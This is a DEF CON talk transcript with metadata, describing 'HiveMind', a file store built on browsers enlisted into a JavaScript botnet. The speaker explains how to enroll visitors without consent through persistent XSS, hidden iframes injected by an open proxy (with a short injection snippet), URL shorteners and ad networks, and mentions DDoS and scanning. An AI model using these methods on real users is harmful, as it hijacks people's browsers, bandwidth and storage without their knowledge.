
HiveMind: Distributed File Storage Using JavaScript Botnets


Formal Metadata

Title
HiveMind: Distributed File Storage Using JavaScript Botnets
Series Title
Number of Parts
112
Author
License
CC Attribution 3.0 Unported:
You are free to use, adapt and copy, distribute and transmit the work or content in adapted or unchanged form for any legal purpose as long as the work is attributed to the author in the manner specified by the author or licensor.
Identifiers
Publisher
Publication Year
Language

Content Metadata

Subject Area
Genre
Abstract
Some data is too sensitive or volatile to store on systems you own. What if we could store it somewhere else without compromising the security or availability of the data, while leveraging intended functionality to do so? This presentation will cover the methodology and tools required to create a distributed file store built on top of a JavaScript botnet. This type of data storage offers redundancy, encryption, and plausible deniability, but still allows you to store a virtually unlimited amount of data in any type of file. They can seize your server -- but the data's not there! Sean Malone has been building and breaking networks and applications for the last 12 years, and he has a diverse practical and academic background in information technology and security. As a Principal Consultant and the primary engagement manager for FusionX, Sean provides clients across all verticals with sophisticated adversary simulation assessments and strategic security guidance. Sean is a key member of the FusionX internal research and development team and his custom security assessment utilities are used in a majority of FusionX engagements. SeanTMalone.com
Transcript: English (automatically generated)
Good afternoon. This is HiveMind. We're looking at distributed file storage using JavaScript botnets. I am Sean Malone, principal security consultant at FusionX. We are definitely hiring. FusionX needs a little bit of an introduction, though, so let me tell you a bit about what we do. We do a combination of penetration testing, red teaming, sophisticated
adversary assessments. Basically, we assess your entire organization, not just a particular network or system or application. So if that sounds like something you'd be interested in, hit me up after the talk. The problem that we're looking to solve here is that sometimes even when using encryption to store sensitive data, we run into problems.
That problem is that with encryption, the data is still present. It's simply encrypted. And if it's encrypted in a way that we can recover it, then someone else can force us to
recover it for them, such as a court order or a $5 wrench. So encryption is not always going to be enough. So if we can't simply store the files encrypted on our own systems, what can we do? The first thing that comes to mind, store the files on someone else's system.
That way if your system is seized, then the files aren't there. The problem is that's usually illegal. So what I want to do is look at a way to do that with standard functionality in a way that's at least less illegal. Mostly legal. So the way we do this is standard
functionality, no exploits. We're just using some tips and tricks and looking at the standard features in web browsers. So what I mean by this is that all of the techniques that I'm presenting here, all of the features that my technique uses are used in real web applications.
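As a sketch of that claim, everything the technique relies on can be checked with a few property lookups against the standard DOM globals; there is no exploit anywhere in the list (the helper name below is illustrative):

```javascript
// The technique only needs these standard, long-supported browser APIs:
// localStorage (HTML5 web storage), WebSocket (C2 channel), Worker (processing).
const REQUIRED_APIS = ["localStorage", "WebSocket", "Worker"];

// Return the subset of required APIs missing from a given global object.
function missingFeatures(globalObj) {
  return REQUIRED_APIS.filter((name) => !(name in globalObj));
}

// In any modern browser, missingFeatures(window) is empty.
```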
So there's nothing to patch. Removing these features would break modern web applications. So that's a great advantage here because this is something that's going to work for the foreseeable future. It's not something that is only going to work until some vendor patches a particular vulnerability. First a disclaimer, though. This is a research
project. I'm not responsible for what you do with this software. It's not intended to be used to store critical data at this point. Though the concept should be able to get there eventually. Also, I'm not a lawyer. Nothing in here is legal advice. And I'm not
responsible for anything legal or illegal that you choose to do with this software. Web browsers have undergone some significant changes in the last 15 years or so. We started off with the most basic form of client side storage or the browser cookie. We had
JavaScript for data processing and Ajax or asynchronous JavaScript and XML for that back end client to server communication. That's changed recently with the advent of HTML 5 features. We have all of those older technologies still present in the browser, but
they've all been upgraded. Now we have web storage to store larger amounts of data in the browser. We have web workers that can spin off JavaScript threads that are separate from the main GUI thread. You can do a lot more processing without gumming up your application. And we have web sockets, which create a persistent socket from the client
browser back to the server. So the end result here is that a web browser is basically a computer program that will communicate back to my server, execute any arbitrary code that I hand it and store any arbitrary data that I ask it to store. Sounds like a botnet
node, right? You might ask what about sandboxing? Doesn't that make it impossible to access the system data, execute code on the system? Yes, it does. That's the purpose of some of the browser security improvements, but the short answer is I don't care about that. I don't need to do anything outside of the normal browser security model. I'm
simply running code in the context of the domain that loads the code and accessing data that I've stored on that same domain. So it's all on the same origin. It's all within the browser security policy. Again, these are features, not bugs. So let's look at what it
takes to actually build a botnet on top of web browsers. The first step in building any botnet is going to be the node infestation. How do we actually get our code running on the node? How do we take control of that particular node? The first and most
obvious technique is to simply use a site that you own. If you own a site that's getting a thousand hits every five minutes, then you have the capability to execute whatever code you want on a thousand different web browsers every minute. That's a lot of power. Most sites don't do anything with that, but there's definitely the potential there.
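On a site you control, enrollment is one hidden iframe; the nginx proxy demoed later in the talk does essentially the same find-and-replace on proxied pages. A minimal sketch, with a hypothetical C2 URL:

```javascript
// Rewrite an HTML page so a hidden iframe pointing at the botnet page is
// inserted just before the closing body tag. The URL here is illustrative.
function injectNodeFrame(html, frameUrl) {
  const frame = `<iframe src="${frameUrl}" style="display:none"></iframe>`;
  return html.replace("</body>", `${frame}</body>`);
}
```

Every visitor who renders the rewritten page silently loads the frame and becomes a node.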
Next one is compromised sites. So any time there's a persistent cross site scripting vulnerability where we can store a piece of JavaScript on the site that is executed every time somebody visits that particular site, we can include every visitor to that compromised site in our botnet by adding that piece of persistent JavaScript onto the
compromised site. URL shorteners are a fun one. Normally you have a URL shortener that simply redirects to the target, but what if we simply load a full screen iframe showing the intended URL and in the background we have a second iframe that is running our botnet
code. You can use ad distribution networks. There was a great talk at Black Hat this year about various ad distribution networks where instead of distributing an image, you can actually give them an iframe source and they'll put an iframe on the target
pages that then sends traffic back to your site. The intent is to use this for sort of SEO page rank type things, but if you have people going to your site, you can make them a member of your botnet. My personal favorite is the anonymous proxy
server. I stood up an anonymous proxy server, just an open anonymous proxy listening on port 8080. I stood this up a few weeks ago, let it just sit there, didn't advertise it, didn't solicit traffic at all, and right now it's getting hit by about 20,000 unique IP addresses every ten minutes. This is
completely unsolicited traffic. I never promised to do anything with this traffic. I never promised to return any particular content. I never promised that the page I return is the actual page they request. Usually it looks a lot like that page that they request, but it also
has an iframe in it. So it's another great way to build a botnet very easily and very quickly. Command and control is done through the HTML 5 web sockets. This quote here is from the official working group publication on web sockets. To enable web applications to
maintain bidirectional communications with server side processes. That could have been written with botnet communication in mind. That's exactly what you want to do for your command and control channel. When that doesn't work, you should always have a way to fall back to Ajax. Older browsers don't support web sockets and sometimes when you're going
through proxies and such, web sockets and proxies don't play nicely so it's always good to have that additional fall back there so you don't lose your nodes. Data storage is done through HTML 5 web storage. Again, a quote from the working group publication. The part that I like here is web applications may wish to store megabytes of user data. What
they really mean is megabytes of application data. Megabytes of whatever the application server decides to push down to the client. So I'm making that megabytes of my data being stored on all of these different browser nodes. The back end is a Ruby on Rails
application with a MySQL database behind the ActiveRecord database abstraction layer. In addition, I'm running a Redis server as well. Redis is an in-memory key value store that has some nice features for what we're doing here. Redis by default has persistence.
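One Redis feature the talk leans on is key expiration: block data parked on the server temporarily can be given a time-to-live. A plain-JavaScript stand-in for that behavior, just to make the idea concrete (this is a toy, not the tool's actual Redis usage; the injectable clock exists only for demonstration):

```javascript
// Toy stand-in for Redis SET + EXPIRE: values vanish once their TTL passes.
class ExpiringStore {
  constructor(now = () => Date.now()) {
    this.now = now;
    this.entries = new Map();
  }
  set(key, value, ttlMs) {
    this.entries.set(key, { value, expiresAt: this.now() + ttlMs });
  }
  get(key) {
    const entry = this.entries.get(key);
    if (!entry) return undefined;
    if (this.now() >= entry.expiresAt) {
      this.entries.delete(key); // expired: the block data is gone for good
      return undefined;
    }
    return entry.value;
  }
}
```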
You can disable that, meaning when the power is pulled, the Redis values are gone. And you can also expire particular keys. So say you're uploading a file and splitting it into blocks: if those blocks temporarily live in Redis, you can simply set a key expiration there and those
blocks disappear after a particular time. So it's a great way to check sort of the time to live for all of the nodes and the blocks for all the different files. So that's what it takes to build a JavaScript botnet. We're going to be using this JavaScript botnet for
data storage, but there's definitely more that we can do with this. Other fun botnet uses would be network scanning, simply checking to see what ports are open. And again, all of this is coming from your nodes. This does not show as coming from a source IP address of your command and control server. DDoS attacks are another fun one. And data processing with web
workers, anything that you can break up into a relatively discrete task, you can push down to these nodes and have the nodes do all of the heavy lifting for you so long as you can write it in JavaScript. JavaScript is not going to be nearly as efficient as
writing it in something like C, but when you consider that you can spin off multiple threads, so you can have four different threads running on four different cores if your node is a quad core system, and if you can do this on, say, a persistent cross site scripting vulnerability on a popular viral video or something, that's a lot of processing
power there. And it's free. Now we have the botnet. Let's look at what it takes to actually build a file system on top of that botnet. First a few definitions here. A file block is what I'm using to refer to a piece of an uploaded file that has a set maximum
size. So a file is going to be made up of multiple file blocks. A node is simply any web browser that's a member of the botnet. And the server is the central command and control server that also serves as sort of the phone book for these files. It's the
directory of what files have been uploaded and where all of these different files live. So when we're storing a file, we upload the file through the web application just like any other web application. And it is going to need to live on the server for
a very short period of time while we execute the following steps. We break this file into the name, the mime type and the data. We take all of this and put it into basically a JSON encoding. So it's a simple string at that point. And we encrypt that. This
is just a simple additional step of AES encryption so that when we push these blocks down to the nodes, the nodes can't see the actual data in the file. The end result is the encrypted data, which is a base 64 string. We split that into a bunch of different file blocks that simply take the first 1024 characters, pull those
off into a block, then the next 1024. All of these elements are tunable here. So there's no particular reason that I'm using 1024; depending on the particular file and the reliability of the nodes, you may want smaller or larger block sizes. Sounds like it's time
for a quick break. All right. What's this called? Shot the noob. It's really hard to get accepted for a talk here at DEF CON. So congratulations to our
new speaker. Very competitive. All right. I need someone from the audience. Over there. Come on up. Yep. You. First time at DEF CON? Right. There you go. I don't even say it anymore: to our first time DEF CON attendees and speakers. Not doing
well. Only three shots to go. Oh, God. Three shots this hour. You can just stay
there for the rest of the talk if you need to. We now have file blocks from our
uploaded file. The next step is storing those blocks in our botnet. B1 represents a particular block one from our uploaded file that is living on the server. We're going to pull in a certain number of nodes from our botnet. So we just randomly pick a
certain number of nodes that have checked in with us in the last minute or so. So we know that they are online. We push this block down to the nodes there. And so now the block lives on the nodes and does not live on the server. The server keeps track of which nodes have that particular block. And it keeps track of the checksum for the
block. But it does not keep the block data itself. So now this is going to be a very transient botnet. As nodes come and go, these particular nodes may only be online for another few minutes. Maybe even another 30 seconds. So what we're doing is we do a
constant heartbeat where every five or ten seconds, depending on how you have this tuned, the nodes are going to be sending up a heartbeat where they basically check in and say, hey, I'm a node. I'm still online. Here's my node ID. Here is the ID and checksum for each block that I have stored in my browser local storage. So
eventually some of these are going to go offline or the data is going to be corrupted either intentionally or unintentionally. We have to keep in mind that we can't trust the nodes here. Somebody running that node could be intentionally modifying the data.
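The server-side bookkeeping implied here can be sketched as follows; function and field names are illustrative, not the released tool's API. Given the latest heartbeat reports, only copies whose checksum still matches count, and any block confirmed on too few nodes gets flagged for re-replication:

```javascript
// expectedChecksums: { blockId: checksum } recorded at upload time.
// heartbeats: one report per live node: { nodeId, blocks: [{ id, checksum }] }.
// minReplicas: replicate any block confirmed on fewer nodes than this.
function blocksNeedingReplication(expectedChecksums, heartbeats, minReplicas) {
  const confirmed = new Map();
  for (const report of heartbeats) {
    for (const block of report.blocks) {
      // Untrusted nodes: count only copies whose checksum still matches.
      if (expectedChecksums[block.id] === block.checksum) {
        confirmed.set(block.id, (confirmed.get(block.id) || 0) + 1);
      }
    }
  }
  return Object.keys(expectedChecksums).filter(
    (id) => (confirmed.get(id) || 0) < minReplicas
  );
}
```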
So once the number of live confirmed good nodes drops below a certain value, we then replicate. We pull in a set of new nodes that do not currently have this block. The server sends a query down to the existing good nodes, pulls that block
back up to the server and distributes it to the new nodes so we're back up to that safe level of replication to ensure that we don't lose that block. We have to go through the server. We can't do this in a strict peer to peer fashion because JavaScript can't
actually open a port from within a browser and listen for an incoming connection. From my perspective it would be great if we could but it's not such a great security move. Retrieving a block looks very similar. The server simply sends out a query to
all of the nodes containing a particular block saying, hey, please send me this block, and the nodes send it back up to the server. All of the nodes will send it back up. The server does a checksum verification on the server side to make sure that what it's getting back is what was actually stored. And then it stores that temporarily in the
Redis data store. And it puts it in there with an expiration of say 20 seconds. So all of the blocks are going to be requested and they're stored locally in memory on the server for that time to live. This lets us rebuild the file now. So we've requested all of
these blocks back from the nodes. We simply concatenate them and rebuild that into encrypted data. And the password is provided at this point by the user. And the
decryption is then done providing us with the name, the mime type and the actual file data, rebuild that into a particular file and provide it as a download to the user. And the user is able to download it from the web application and from the user's perspective, once all of this is set up and running, it's very simple. It's
provide a file and a password, upload the file, come back later, provide that password, download the file and have the file back on your system. But this file meantime has been distributed across all of these different nodes. So getting back to where we started this talk, we want to do this so that that file is not living on the server
itself. So when everything goes wrong, here's what happens. Pick your favorite three letter agency. They come in and seize the server because they've heard that you're storing some sort of data that they want to know about. What happens when they seize the
server is that that server goes offline and the nodes go offline. They're no longer connecting to the command and control server. In this case, the block replication is going to fail because the nodes are going offline, but they're all going offline at once. The server
isn't getting that heartbeat. The blocks aren't being replicated to new nodes. The end result is that the blocks are lost. And when those blocks are lost, the server no longer has a correct phone book. The phone book for those blocks is out of date. It doesn't know where to find those blocks if you want to go back and download that
file. So the end result is that the files are unrecoverable. Now, let me be clear on what I mean by unrecoverable here. It's practically speaking, it's not feasible to recover the file. It is definitely possible to go out and seize all of the nodes or at
least a critical mass of the nodes in the botnet, but that's going to be at least an order of magnitude more difficult than simply seizing a server and getting a court order for the owner to decrypt the data on that server. It's also possible to poison the botnet: if you're part of the
three-letter agency, you inject enough of your own nodes deliberately into this botnet, log all of the block data and then rebuild the file after you seize the server. You have the additional layer of encryption here but as we talked about, sometimes that's not
enough. So the only real protection that you have against this is to have a sufficiently large botnet that it would be difficult to seize every node. There's also a certain element of security through obscurity here where you have to know that this is how the files are being stored before the server is seized. You can't go back afterwards and
inject nodes once the server has gone offline, because those blocks can't be recovered in order to be replicated to your nodes. Obviously it's different if the server itself is compromised, and I mean compromised as opposed to seized. So if that three-letter agency is able to
access the server without the server going offline, then they can issue that rebuild command and intercept the file on the server itself. So there are definitely some limitations to be aware of. But there's always going to be that security usability tradeoff here. And I think that what we have here provides a drastic increase in
security in that it is significantly more difficult to recover the file if you're looking at a server seizure situation. But it's still very usable from the end user perspective. So there's some interesting unanswered legal questions here and I'm
deliberately labeling these unanswered. I have my own personal opinions on these but I think there's still a lot of unknowns here. The first one is, is this legal? I'm calling it mostly legal. There are definitely legal ways to build the botnet such as if
somebody is going to a site that you own. But what about the very act of storing a significant amount of data that's unnecessary for the functionality of the site? The user's intent was not to download that data. Is this legitimate or does that constitute
unauthorized use of a computer? And the same question for bandwidth and processing power. Because any time we're doing all of that heartbeat and block traffic, we're using bandwidth and we're using processing power as well. This is even more true if we're doing an actual data processing botnet with web workers. Bandwidth is going to be even
more true if we're, say, conducting some sort of high traffic application using those nodes. I look at this and say, you know, this sounds a lot like an animated Flash advertisement. If you go out to a particular site and they push down a Flash
advertisement, it's additional bandwidth when that ad is pushed down. It's additional storage, at least temporarily, in the browser storage there and it's definitely additional processing power. So we're talking about more of a difference in quantity as opposed to
quality. My opinion is that legally it's acceptable because somebody did deliberately go to that site and when you go to that site there's sort of an implicit assumption that you're going to download and execute in your browser whatever that site gives to you. There's no
legal precedent in this area. From the other side, what if you're storing data without encryption or without any form of encoding and so it turns up in a forensic search of one
of the nodes. So somebody's running their web browser, happens to become a member of the botnet, and you push down data. If their system is later analyzed forensically and this illegal content shows up on their system, that's going to look pretty bad for them. So if
a site that you deliberately went to loaded a hidden iframe and pushed that data down onto your computer, are you responsible for that data? I don't know. Demo time. So we'll start off showing the node side of things. This is my
personal website. I'm loading it through this proxy here. I've got it running with FoxyProxy. And if we look at the source for the site, most of this is normal source, but
down at the bottom, right before the closing body tag, we've got this hidden iframe. This is done through a simple nginx proxy, and there's a rule in there that says do a find and replace on the body content of the response and replace that closing body tag with the
iframe followed by the closing body tag. It's really simple. It's very efficient and it pushes out iframes to thousands of different nodes. On the console side of things, we see all of these different requests going back and forth: the check queue, and again
I've had this fall back to Ajax because we're going through the proxy. And it's also easier to see because some of Firebug's debugging features haven't really caught up with the persistent web socket connections. So these post requests for check queue are basically asking: is there anything that I need to do? Are there any blocks that you need me to
store? Are there any blocks that you need me to send back to the server? The
post data here is simply the block ID for each file block, the node UID, and the MD5 checksum for each of those file blocks. So these are blocks that are currently being
stored in this node. So it does that heartbeat every so often to just let it know, hey, I'm still here. These are the blocks. These are the checksums. However, if I close down Firebug, you see my pretty face and no traffic there. So it's all completely
transparent in the background. Here's what the C2 server interface looks like. Again, this is a Ruby on Rails application. We've got a simple interface showing the files that have been uploaded. And there's a separate page here for the nodes. So this is a list
of nodes that have been active within the last minute. In order to retain a little bit more control over this particular demonstration, I'm not having this run with thousands of different nodes. This is just from a few IP addresses and systems that I control here. The last updated time is simply the last time we've heard from the node there. The
UID is something that we store in a cookie on the node to keep track of which node is which. And then we correspondingly use that in the Redis data store for tracking which blocks live on which nodes. So let's take a look at what it takes to upload a
file. We simply put in the name of the file, put in a password, choose a file that we're going to upload, and go ahead and upload it. Basically the same as any other web application
file upload. The file itself is assigned a UID for the directory tracking purposes. When we go over to detail, we see it's got this file name that we assigned it, but the original file name is encrypted with the file data and stored out on the nodes. Here's
the listing of all of the file data with each of the file blocks and then the nodes that each file block lives on. So at this point we've got the replication set to four nodes. In a production botnet you definitely want to have that set higher. Say maybe
distribute across 20 different nodes and if it drops below 10 replicate until you're back up to 20. So there's a large number of blocks here because I have my block size set relatively small. Again, all of this is tunable. When we go into the fetch dialogue,
we put the password back in, go ahead and fetch the file. It loads all the different file blocks and looks like I typoed it. I may have typoed it when I created it. There
we go. All right. So this is a real time loading bar here, in that it's actually showing which blocks we have and which ones we're still waiting on. So as it goes across, that's showing we've sent out the request and more and more blocks are coming
in. When it gets to the end we finally have all of the blocks. The file's ready. We can concatenate, decrypt with that password that we just provided, and the file's downloaded. Yes, we want to keep this file and now we're able to view our data that's getting more and more dangerous to be caught with. I am going to be releasing the code for the botnet
itself. Both the engine X side of things which is basically an engine X configuration
file. That's all there is to it. And then I'm releasing the web application side of things with the Ruby on Rails application. Again, it's a research project. It's not the most stable software out there. But you'll at least be able to see how I do things,
how I track the blocks. All of that is going to be available. Code will be on GitHub, but it will be linked to from my personal site. And the slides will be up there as well, as well as a video of the presentation. With that, I'll open it up for questions.
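The replication scheme described above — track which nodes hold each block, and if a block's replica count drops below a minimum, replicate it back up to a target — can be sketched roughly like this. All names here are hypothetical; per the talk, the real system keeps this block-to-node map in Redis rather than in memory:

```javascript
// Sketch of server-side replication bookkeeping. Each file block tracks
// which nodes currently report holding it; when a block's replica count
// falls below a minimum, it is re-replicated up to a target count.
// The 20/10 thresholds are the example numbers from the talk.

const TARGET_REPLICAS = 20; // desired copies per block
const MIN_REPLICAS = 10;    // re-replicate when we drop below this

// blockId -> Set of node UIDs that reported holding the block
const blockNodes = new Map();

function recordHeartbeat(nodeUid, blockIds) {
  for (const id of blockIds) {
    if (!blockNodes.has(id)) blockNodes.set(id, new Set());
    blockNodes.get(id).add(nodeUid);
  }
}

function dropNode(nodeUid) {
  // Called when a node hasn't been heard from recently.
  for (const nodes of blockNodes.values()) nodes.delete(nodeUid);
}

// Return the blocks that need more copies, and how many each needs.
function replicationWork() {
  const work = [];
  for (const [id, nodes] of blockNodes) {
    if (nodes.size < MIN_REPLICAS) {
      work.push({ blockId: id, copiesNeeded: TARGET_REPLICAS - nodes.size });
    }
  }
  return work;
}
```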
I think we have two microphones, two different locations in the room here. So if we could use those to make sure I can hear you, that would be great. Yes? Hi. I wanted to ask you what happens if the three‑letter agency seizes your system while
it's still operating? Still connected to the net? So if they seize it while it's still connected: if they take it offline, the data's gone, but if they
keep it online and are able to take control of the operating system while it stays online, then they would be able to rebuild it. So you want to take the normal physical security measures to make it as difficult as possible for them to take control without actually unplugging the system or at least disconnecting it from the network there.
Thanks. I'm wondering if the Internet connection to the server goes down, does that mean all your files disappear with it, too, because now all nodes are disconnected? Correct. If the Internet connection goes down, if the nodes can no longer talk to the server,
then the data replication fails and the blocks are lost. If it comes back online quickly enough, probably within five minutes or so, you'll probably have enough nodes left that you can recover the data, but it's not guaranteed. So the purpose of this is definitely to store data where it is better to lose it entirely
than to have somebody recover that data, decrypt it and be able to pin it on you. Thank you. Over here. What about the file size limits of what the browser will let you store? Yes. So each node is generally able to store roughly five megabytes of data without prompting the user, and we definitely don't want the user to be prompted to allow
more data, but that's five megabytes per node. So if you have, say, 10,000 nodes, that's 50,000 megabytes. Even if your replication cuts that by a factor of ten or so, that's still a lot of data that can be stored in this botnet. Yes.
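That back-of-envelope capacity math — roughly 5 MB of Web Storage per node without a user prompt, scaled by node count, then divided by the replication factor — can be written out as a small helper. The function name and the default replication factor of ten are illustrative assumptions:

```javascript
// Rough usable capacity of the botnet, in megabytes. Each node can hold
// ~5 MB of Web Storage without prompting the user; every block is stored
// on multiple nodes, so usable capacity is raw capacity divided by the
// replication factor.
function botnetCapacityMB(nodeCount, mbPerNode = 5, replicationFactor = 10) {
  const raw = nodeCount * mbPerNode; // total raw storage across all nodes
  return raw / replicationFactor;    // usable after replication overhead
}

// 10,000 nodes * 5 MB = 50,000 MB raw; with 10x replication, ~5,000 MB usable.
```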
Would it be possible to set a timeout on the Web Storage to make the node side blocks self-destruct after a certain amount of time? Yes. And you can definitely add such a timeout there. It's sort of a fail-safe kill switch type thing where if the node cannot talk to the server within a certain number of seconds, then it simply wipes the local
storage in the browser there so that even if the nodes are recovered or seized, more work has to be done at least in order to access that data. What kind of transfer overhead is there in comparison to the file size, both on the server and the node end?
So in terms of the actual algorithm for the encoding, for the encryption and the encoding, I don't know exactly as a percentage of file size, but it's basically AES encryption or JSON encoding, AES encryption, and then it's just chopping it up into blocks.
I mean how much data is being sent back and forth? What kind of bandwidth are you using compared to the file size? So it's going to depend entirely on how much data you're storing and how much is stored in the browser. Those check queue commands are very small. That's a post request with no data. That's just is there
anything for me to do, and normally it's just getting back an empty array. There's nothing left to do. The heartbeat command is what you saw up there on the screen with the block IDs and the MD5 for each block, so there's a little bit more, but usually it's just getting back a 200 OK response. So it's pretty lightweight. As far as the total
amount of bandwidth, it's going to depend on your tuning parameters for how quickly you're checking that queue and how quickly or how often you're sending the heartbeats. So those can all be tuned depending on how stable the particular nodes in this botnet are. Yes?
Do you have any way of protecting against say a malicious user who connects and sets their local storage to be persistent in their browser versus just I assume you have it set for like a transitory temporary thing so it's not permanent with the domain once it's offline? So we do store it in local storage, meaning that it is going to be more
persistent, and the reason for doing that is that if you have a browser with multiple tabs open, all going through that proxy, you want the user to be able to close tabs, move to other tabs and have that data stay there so you're not
needing to replicate unnecessarily. It would be possible to use session storage, which is going to expire sooner. Again, no matter what you're doing, if you have a deliberately poisoned botnet and that three‑letter agency is able to get a
sufficiently large number of nodes, a sufficiently high percentage of nodes, then regardless of how you set it, if they're logging that traffic, they'll be able to log those blocks. So it may provide a little bit of additional security, but not significantly so. Yes? Are there any inherent restrictions or reasons why you wouldn't have the clients
connect to a series of failover servers in the event that your power goes out or your Internet connection is dropped? So you could, however, that configuration would need to be pushed down from the C2 server and that gives that three‑letter agency multiple chances.
So if they seize that first server and everything goes offline, if replication is still being done through a second, third, fourth, fifth server, then once they do forensic analysis on the first server, they'll see, well, we screwed up our chances with this one, but we know that we have to take different tactics and possibly poison the botnet since it still exists and is being replicated on those other servers as well.
So again, it would definitely provide a higher availability guarantee, but it would provide a significantly reduced confidentiality guarantee at that point. Yes?
When you mentioned the legal questions outstanding, have you consulted legal counsel about that? I have not. I've got a card for you after. Sounds good, yeah. I'd definitely be interested in exploring that side of things a little bit more. Do you have a sense empirically of what percentage of the file lives on the server at
any given moment because of replication? Empirically, no. Theoretically it depends on how quickly you need to replicate. So the more stable your nodes are, the longer those
nodes are online, the less often you're going to need to replicate. And it's that replication that causes the data to need to flow through the server again. Any time a file is uploaded, any time a file is rebuilt and any time a block is replicated, that data is
stored on the server with a timeout of 20 seconds. For a relatively fast botnet where you have at least one node for each block that's going to reply much more quickly than that, you could probably tune that down to more like five or ten seconds. But it's hard to say for sure because it depends entirely on the makeup of that botnet. All right. I
think we're done. Thank you very much.